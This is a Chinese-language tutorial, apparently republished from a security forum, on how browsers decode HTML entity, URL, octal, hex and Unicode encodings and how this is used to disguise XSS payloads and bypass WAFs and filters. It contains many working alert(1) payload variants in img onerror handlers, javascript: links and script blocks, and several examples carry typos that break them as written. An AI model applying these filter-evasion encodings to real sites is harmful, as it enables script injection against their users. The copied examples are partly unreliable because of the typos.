查看原文
其他

XSS编码浅析

哆啦安全 2022-12-06

The following article is from 亿人安全 Author HBXQ

输出点处做编码最主要的目的是什么,为什么要去做编码?

最主要的目的就是绕WAF、过滤函数,通常在没有WAF和过滤函数的情况下,我们只需要使用原始字符,XSS攻击的一大精髓就是简短,利用少量代码达到攻击效果,编码往往会使exp的长度增加


输出在HTML中

Entity(实体)编码

概念:在编写HTML页面时,需要用到"<"、">"、"空格" 等符号,直接输入这些符号时,会错误的把它们与标记混在一起,非常不利于编码。那么就需要把这些字符进行转义,以另一种方式书写,以相同的形式展现。在HTML中,这些字符可称为HTML Entity,即HTML字符实体。


编码范围:包括但不限于以下字符: ASCll Characters(可见部分).ISO 8859-1 Characters、lSO 8859-1 Symbols、Math Symbols、Greek Letters、 Miscellaneous HTML entities。

Entity(实体)编码 ————两种格式

格式一:&entityName

说明:"&"开头,";"结尾,以语义的形式描述字符。如字符"<",英文名称为"less than",EntityName为"<",取自"less than"2个单词的首字母。

格式二:&#entityNumber

说明:"&#"开头,";"结尾,以编号的形式描述字符。此编号可以为十进制或十六进制(以"&#x"开头)等数字格式。

注:entityName的数量要小于entityNumber的数量


Entity(实体)编码 ————实例

<h1>Entity编码</h1>
<p>entityName:</p>
&lt;<br>
&gt;<br>
&excl;<br>
&quot;<br>
&num;<br>
8amp ;<br>
<p>entityNumber:</p>
&#60;<br>
&#62;<br>
&#33;<br>
&#34;<br>
&#35;<br>
&#38;<br>

浏览器解析行为

行为1: HTML解析器在建立文档树的时候会针对节点内的Entity编码解码后传输。


等效语句:

<img src="1" onerror="alert(1)">

通过entityNumber编码

<img src="1" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

注意:属于标签本身结构的部分不会被解析

<img src=1 onerror&#61;alert(1)>

<a href="javascript:alert(1)">click me</a>

<a href="j&#x61;vascript:alert(1)">click me</a>

行为2:允许在如之后插入任意多个0。

等效语句:

<img src="1" onerror="alert(1)">

<img src="1"

onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

<img src="1"
onerror="&#00000000000000097;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

行为3:针对URL类型的属性,允许进行一次URL编码。

注:URL类型的属性,通俗理解就是链接的属性

等效语句:

<a href="javascript:alert(1)">click me</a>

<a href="j&#x61;vascript:alert(1)">click me</a>

<a href="j&#x61;vascript:%61%6c%65%72%74%28%31%29">click me</a>

行为4:URL编码的部分可以进行第二次Entity编码。注:不无限套娃

等效语句:

<a href="javascriptalert(1)">click me</a>
<a href="j&#x61;vascript:alert(1)">click me</a>
<a href="j&#x61;vascript:%61%6c%65%72%74%28%31%29">click me</a>
<a href="j&#x61;vascript:&#37;&#54;&#49;&#37;&#54;&#99;&#37;&#54;&#53;&#37;&#55;&#50;&#37;&#55;&#52;&#37;&#50;&#56;&#37;&#51;&#49;&#37;&#50;&#57;">click me</a>


行为5:URI类型的属性忽略Tab和回车符。

等效语句:

<a href="javascript:alert(1)"> click me</a>
<a href="j&#x61;vascript:&#37;&#54;&#49;&#37;&#54;&#99;&#37;&#54;&#53;&#37;&#55;&#50;&#37;&#55;&#52;&#37;&#50;&#56;&#37;&#51;&#49;&#37;&#50;&#57;">click me</a>

注:Tab符和回车符也可以再进行一次Entity编码

行为6: Entity编码的;可以去除。

等效语句:

<a href="javascriptalert(1)">click me</a>
<a href="j&#x61vascript:&#37&#54&#49&#37&#54&#99&#37&#54&#53&#37&#55&#50&#37&#55&#52&#37&#50&#56&#37&#51&#49&#37&#50&#57">click me</a>

注:不同格式的Entity编码可以混用

四种编码策略

C语言编码:对于一些控制字符,使用特殊的C类型的转义风格(例如\n和\r),公认的ECMAScript编码。

八进制编码:三个八进制数字,例如"e"编码为"\145",该语法不属于ECMAScript,但是基本所有的浏览器都支持。

十六进制编码:两个十六进制数字,例如"e"编码为"\x65”,同样不属于ECMAScript,但是在解析底层,c语言中有很好的支持。

Unicode编码:如\u0065可表示字符e,属于ECMAScript编码。

注:ECMAScrip是Javascript的一个标准

例:

<script>
document.getElementByld("a").\u0069\u006e\uO06e\u0065\u0072\u0048\u0054\u004d\u004c="\x3c\151\155\147\40\163\162\143\75\61\40\157\156\145\162\162\157\162\75\141\154\145\162\164\50\61\51\u003e";
</script>


前三种只能用于给字符串编码。

第四种还可以用来给方法名编码

不可以代替括号,引号,点号等特殊字符

<script>
\u0061lert("test");
</script>


常见误区

误区1: XSS,不是专门去”绕过”限制。误区2: XSS,不仅仅存在于你所看得见的位置。误区3: XSS,绕过限制不是乱用字符去绕过,切忌盲目。

总结

在刚接触XSS的时候,需要做的是了解其中的原理与编码方式,自己构造的语句中哪里可以在此基础上进行编码的构造,掌握了XSS编码的基础,在之后的学习中可以更好的理解别人构造的攻击载荷,而不是盲目的瞎改,导致语句无法解析不能绕过防护。


文章首发于:奇安信攻防社区https://forum.butian.net/share/831


知识星球干货资源(一年内免费),持续更新中,欢迎加入哆啦安全-知识星球

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存